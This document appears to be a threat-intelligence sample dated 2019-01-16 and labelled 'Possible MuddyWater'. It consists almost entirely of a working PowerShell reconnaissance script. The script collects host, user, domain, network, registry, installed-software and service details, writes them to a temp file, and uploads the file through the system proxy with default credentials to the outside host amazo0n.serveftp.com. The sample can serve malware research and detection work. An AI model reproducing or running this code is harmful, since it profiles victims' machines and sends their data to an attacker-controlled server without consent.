2019-01-16: Possible MuddyWater

1. function im(){$d=$env:APPDATA+"\ID.dat";if(test-path $d){$d1=Get-Content $d |Where-Object { $_ -match "ID=";};$d2=$d1 -split "=";return $d2[1];}}
2. function MyTime(){try{return Get-Date -Format g;}catch{return "Error Time";}}
3. function GetMachineName(){try{return $env:COMPUTERNAME;}catch{return "Error ComputerName";}}
4. function GetUserName(){try{return $env:USERNAME;}catch{return "Error Username";}}
5. function GetDomainName(){try{return $env:USERDOMAIN;}catch {return "Error Domain name";}}
6. function OSDetails(){try{$Name = Get-WmiObject -Class Win32_OperatingSystem;return $Name.caption;}catch {return "Error Os name";}}
7. function GetMyIP(){try{$wc = New-Object System.Net.WebClient;$wc.proxy = [Net.WebRequest]::GetSystemWebProxy();
8. $wc.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials;$readIP = $wc.DownloadString("https://api.ipify.org/");return $readIP;}catch{return "Erro Ip";}}
9. function g-user{return Get-WmiObject -Class Win32_UserAccount}
10. function Get-Information() {[CmdletBinding()]Param ()
11. function registry_values($regkey, $regvalue,$child){if ($child -eq "no"){$key = get-item $regkey;}
12. else{$key = get-childitem $regkey}$key | ForEach-Object {$values = Get-ItemProperty $_.PSPath; ForEach ($value in $_.Property) { if ($regvalue -eq "all") {$values.$value}
13. elseif ($regvalue -eq "allname"){$value} else {$values.$regvalue;break}}}}
14. $output = $output + "`n`n Shares on the machine:`n" + ((registry_values "hklm:\SYSTEM\CurrentControlSet\services\LanmanServer\Shares" "all" "no") -join "`r`n");
15. $output = $output + "`n`n Environment variables:`n" + ((registry_values "hklm:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" "all" "no") -join "`r`n");
16. $output = $output + "`n`n Installed Applications:`n" + ((registry_values "hklm:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" "displayname") -join "`r`n") ;
17. $output = $output + "`n`n Domain Name:`n" + ((registry_values "hklm:\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\History\" "all" "no") -join "`r`n") ;
18. $output = $output + "`n`n Running Services:`n" + ((net start) -join "`r`n");$output;}
19. function prx(){try{return ([System.Net.WebProxy]::GetDefaultProxy()).Address}catch{return "error in read proxy"}}
20. function ufile($filename,$id,$tname){try{$url="http://amazo0n.serveftp.com/users.php?tname="+$tname+"&path=Data";$enc=[System.Text.Encoding]::UTF8;$wc = New-Object System.Net.WebClient;
21. $wc.proxy = [Net.WebRequest]::GetSystemWebProxy();$wc.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials;$wc.Headers.Add("Content-Type", "binary/octet-stream");
22. $str = $enc.GetString($wc.UploadFile($url,"POST",$filename));$str=$str.trim();return $str;}catch{return "false";}}
23. function main(){$r=im;$f=$env:TEMP+"\"+$r+".txt";$det1=MyTime;$det2=GetMachineName;$det3=GetUserName;$det4=GetDomainName;$det5=OSDetails;$det6=GetMyIP;$det7=g-user|Out-String;$det8=Get-Information;
24. $det9=ipconfig /all|Out-String;$det11=prx|Out-String;
25. $det0="RunTime: "+$det1+"`nMachinName: "+$det2+"`nUserName: "+$det3+"`nDomainName: "+$det4+"`nOsName: "+$det5+"`nIP: "+$det6+"`nG-user: "+$det7+"`nG_INF: "+$det8+"`nIPCONFIG: "+$det9+"`nProxy: "+$det11;
26. $det0 | out-file $f -Encoding default -Force;$tname="T_"+$r;$d=ufile $f $r $tname;}
27. main